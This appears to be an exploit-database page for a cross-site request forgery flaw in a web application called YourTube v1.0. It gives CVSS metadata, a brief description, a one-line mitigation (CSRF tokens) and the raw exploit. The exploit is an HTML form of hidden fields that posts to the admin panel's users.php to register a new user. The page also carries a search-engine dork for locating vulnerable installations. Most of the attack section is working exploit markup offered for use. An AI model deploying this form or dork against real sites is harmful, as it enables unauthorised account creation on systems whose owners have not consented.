header-logo
Suggest Exploit
vendor:
YourTube
by:
AtT4CKxT3rR0r1ST
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: YourTube
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:ac4p:yourtube:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

YourTube v1.0 CSRF Vulnerability (Add User)

A Cross-Site Request Forgery (CSRF) vulnerability exists in YourTube v1.0, which allows an attacker to add a new user to the application. The attacker can craft a malicious HTML page containing a form with hidden fields that will be automatically submitted to the vulnerable application. The form contains the parameters necessary to add a new user, such as username, password, email, gender, country, signature, and activation status. When a logged-in user visits the malicious page, the form will be automatically submitted and the new user will be added to the application.

Mitigation:

The application should implement a CSRF protection mechanism, such as a CSRF token, to prevent unauthorized requests.
Source

Exploit-DB raw data:

YourTube v1.0 CSRF Vulnerability (Add User)
====================================================================
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ac4p.com/
.:. Dork           : inurl:"Powered by YourTube v1.0"

####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/card/admincp/users.php">
<input type="hidden" name="action" value="Register"/>
<input type="hidden" name="vusername" value="user1"/>
<input type="hidden" name="vpass" value="123456"/>
<input type="hidden" name="email" value="user1@hotmail.com"/>
<input type="hidden" name="gender" value="m"/>
<input type="hidden" name="country" value="palestine"/>
<input type="hidden" name="altoge" value="My signature"/>
<input type="hidden" name="activated" value="1"/>
</form>

</body>
</html>

####################################################################